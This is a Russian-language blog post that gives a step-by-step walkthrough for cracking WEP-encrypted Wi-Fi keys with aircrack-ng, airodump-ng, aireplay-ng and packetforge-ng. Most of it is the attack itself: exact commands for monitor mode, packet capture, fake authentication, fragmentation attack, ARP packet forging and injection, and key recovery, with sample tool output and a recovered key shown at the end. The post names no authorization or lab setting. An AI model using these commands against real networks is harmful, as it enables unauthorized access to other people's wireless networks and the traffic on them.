Взлом WEP

Wired Equivalent Privacy (WEP) — алгоритм для обеспечения безопасности сетей Wi-Fi. Используется для обеспечения конфиденциальности и защиты передаваемых данных авторизированных пользователей беспроводной сети от прослушивания. Существует две разновидности WEP: WEP-40 и WEP-104, различающиеся только длиной ключа. В настоящее время данная технология является устаревшей, так как ее взлом может быть осуществлен всего за несколько минут. Тем не менее, она продолжает широко использоваться. Для безопасности в сетях Wi-Fi рекомендуется использовать WPA. WEP часто неправильно называют Wireless Encryption Protocol.

Все атаки на WEP основаны на недостатках шифра RC4, таких, как возможность коллизий векторов инициализации и изменения кадров. Для всех типов атак требуется проводить перехват и анализ кадров беспроводной сети. В зависимости от типа атаки, количество кадров, требуемое для взлома, различно. С помощью программ, таких как Aircrack-ng, взлом беспроводной сети с WEP шифрованием осуществляется очень быстро и не требует специальных навыков.

От слов к делу

Пункт 0 (подготовка адаптера)

адаптер может быть занят, поэтому остановим его и запустим снова

airmon-ng stop wlan0
airmon-ng start wlan0

Нам будет сказано, что режим прослушивание запущен на каком-то интерфейсе (в моём случае это  mon0 , его я и буду использовать в примерах к этой статье)

Пункт 1 (выбор канала)

1) Сканируем все каналы:

airodump-ng mon0

2) Выбираем канал, с которым будем работать

останавливаем сканирование и выбираем канал, который будем дальше сканировать.

Пункт 2 (настройка нашего устройства)
1) Останавливаем наше устройство:

airmon-ng stop wlan0

2) Проверяем на наличие других устройств:

iwconfig

3) Устанавливаем устройство на выбранный нами канал:

airmon-ng start wlan0 6

 

6 — номер выбраного канала.

Важно запустить именно физический интерфейс, а не виртуальный, т.е wlan, а не mon.

4) Проверяем

iwconfig

Мы должны увидеть что-то вроде этого

Скриншот 2014-09-20 21.32.15

Пункт 3 (Перехват пакетов и подбор пароля)
1) Включаем режим сбора пакетов

airodump-ng -c 9 -w FileName --bssid BSSID mon0

Собираем пакеты, которые летят по 9 каналу, в файл с названием FileName относящиеся к сети BSSID интерфейсом mon0

2) Нагоняем трафик:

Открываем дополнительное окно теорминала и выполняем в нем следующие команды:

aireplay-ng -1 0 -a BSSID mon0
aireplay-ng -5 -b BSSID  mon0

После первой команды должны увидеть примерно такой результат

No source MAC (-h) specified. Using the device MAC (00:14:D1:30:7F:46)
19:30:28 Waiting for beacon frame (ESSID: ESSID) on channel 6
Found BSSID "00:1B:11:E7:DD:D5" to given ESSID "ESSID".
19:30:28 Sending Authentication Request (Open System) [ACK]
19:30:28 Authentication successful
19:30:28 Sending Association Request [ACK]
19:30:28 Association successful 🙂 (AID: 1)

После второй что-то вроде этого

No source MAC (-h) specified. Using the device MAC (F8:1A:67:1F:0C:21)
18:30:42 Waiting for beacon frame (BSSID: 34:08:04:B7:EF:B4) on channel 8
18:30:42 Waiting for a data packet...
Read 3179 packets...

Size: 68, FromDS: 1, ToDS: 0 (WEP)

BSSID = 34:08:04:B7:EF:B4
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 34:08:04:B7:EF:B4

0x0000: 0862 0000 ffff ffff ffff 3408 04b7 efb4 .b........4.....
0x0010: 3408 04b7 efb4 30b2 56db a300 d19d 28f5 4.....0.V.....(.
0x0020: 7a6f 1cd4 9425 31b9 f4cf 3ddb dea6 1695 zo...%1...=.....
0x0030: c1c6 8540 074b 013f a179 22ed e724 c028 ...@.K.?.y"..$.(
0x0040: 2dfc e6dc -...

Use this packet ?
[\code]
Отвечаем "Y" и ждем дальше
Теперь когда мы получили файл с расширением xor


packetforge-ng -0 -a BSSID -h MyMAC -k 255.255.255.255 -l 255.255.255.255 -y HackFile.xor -w ArpRequest
aireplay-ng -2 -r ArpRequest mon0

После выполнения второй команды нас спросят хотим ли мы использовать данный пакет, отвечаем "y"

3) Запускаем подбор пароля:

aircrack-ng FileName*.cap

Пункт 4 (Ключ найден)
qxetIxPx60A

Добавить комментарий

Заполните поля или щелкните по значку, чтобы оставить свой комментарий:

Логотип WordPress.com

Для комментария используется ваша учётная запись WordPress.com. Выход /  Изменить )

Google photo

Для комментария используется ваша учётная запись Google. Выход /  Изменить )

Фотография Twitter

Для комментария используется ваша учётная запись Twitter. Выход /  Изменить )

Фотография Facebook

Для комментария используется ваша учётная запись Facebook. Выход /  Изменить )

Connecting to %s